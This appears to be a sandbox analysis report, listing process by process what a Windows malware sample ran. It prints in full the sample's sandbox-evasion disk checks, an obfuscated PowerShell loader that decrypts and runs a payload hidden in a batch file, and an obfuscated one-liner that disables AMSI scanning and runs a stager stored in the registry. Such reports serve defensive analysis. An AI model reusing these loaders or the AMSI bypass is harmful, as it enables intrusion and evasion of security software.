                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:21
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:03:42:35
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Manufacturer,Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:03:42:35
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:03:42:57
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:03:42:57
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:28
                            Start time:03:43:03
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:31
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                            Imagebase:0x7ff76f990000
                            File size:235'008 bytes
                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:32
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                            Imagebase:0x330000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                            Imagebase:0x330000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crUBwWNbWsKMjsxdFIT=aMvXsEUhmbVC @([String])([IntPtr]);$CpOqYoEODudajRwpdwKjEO=aMvXsEUhmbVC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xRGvgkyzmYH=$SWnYXVUkgpflw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$PWtaGkrbiCHSQK=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$wJqytHrusrDKQVuUA=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$CBvLQPx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invoke($Null,@([Object]$CBvLQPx,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+'a'+'nB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$GtTUGmXcNy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,4,[ref]$GtTUGmXcNy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SjReXwPFwLrQCguSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,0x20,[ref]$GtTUGmXcNy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](45)+''+'s'+'t'+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\dllhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
                            Imagebase:0x7ff70f330000
                            File size:21'312 bytes
                            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:39
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\winlogon.exe
                            Wow64 process (32bit):false
                            Commandline:winlogon.exe
                            Imagebase:0x7ff7cd660000
                            File size:906'240 bytes
                            MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:40
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\lsass.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\lsass.exe
                            Imagebase:0x7ff7a2ae0000
                            File size:59'456 bytes
                            MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:41
                            Start time:03:43:14
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:42
                            Start time:03:43:15
                            Start date:04/10/2024
                            Path:C:\Windows\System32\dwm.exe
                            Wow64 process (32bit):false
                            Commandline:"dwm.exe"
                            Imagebase:0x7ff74e710000
                            File size:94'720 bytes
                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:43
                            Start time:03:43:16
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:44
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:45
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIADAP.exe
                            Wow64 process (32bit):false
                            Commandline:wmiadap.exe /F /T /R
                            Imagebase:0x7ff7fb760000
                            File size:182'272 bytes
                            MD5 hash:1BFFABBD200C850E6346820E92B915DC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:46
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:47
                            Start time:03:43:18
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:48
                            Start time:03:43:18
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:49
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:50
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:51
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:52
                            Start time:03:43:21
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:53
                            Start time:03:43:22
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:54
                            Start time:03:43:23
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:55
                            Start time:03:43:23
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:56
                            Start time:03:43:24
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:57
                            Start time:03:43:25
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:58
                            Start time:03:43:25
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:653
                            Start time:03:43:37
                            Start date:04/10/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:671
                            Start time:03:43:45
                            Start date:04/10/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Disassembly

                            No disassembly